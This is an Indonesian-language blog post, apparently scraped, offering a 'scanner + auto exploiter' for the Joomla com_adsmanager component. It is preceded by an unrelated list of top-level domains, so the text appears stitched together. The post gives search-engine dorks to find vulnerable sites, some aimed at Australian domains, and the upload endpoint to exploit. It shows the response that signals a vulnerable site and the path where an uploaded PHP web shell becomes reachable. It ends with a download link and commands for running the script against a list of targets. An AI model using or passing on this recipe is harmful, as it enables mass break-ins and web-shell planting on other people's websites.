.aero .cat .coop .jobs .mobi .museum .pro .tel .travel

Infrastruktur
.arpa .root

Startup phase
.asia

Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx

Dihapus
.nato

Dipesan
.example .invalid .localhost .test

Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp

Joomla Com_Adsmanager Scanner + Auto Exploiter PHP

Dork :
- inurl:index.php?option=com_adsmanager
- inurl:index.php?option=com_adsmanager intitle:-ads site:.au
- intext:"adsmanager version 2.5"
- "com_adsmanager" site:.au
- Kembangin lagi ya :)

Exploit :
TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component
*Jika vuln akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_960"}

Shell Akses :
TARGET/tmp/plupload/NAMA_SHELL_KAMU.php

Script Auto Exploit :
Scriptnya disini sudah w jadiin satu di rar, cara gunainnya tinggal extraxt terus command seperti biasanya.
Download scriptnya disini

Cara Penggunaan :
- command: php scriptkamu.php targetlist.txt
- Untuk membuka akses shell kusus pengguna windows bisa lngsung command: hasil.html , nanti akan otomatis terbuka di browser.
- Lebih jelasnya lihat di ss bawah :)

Screenshot :
Semoga Bermanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI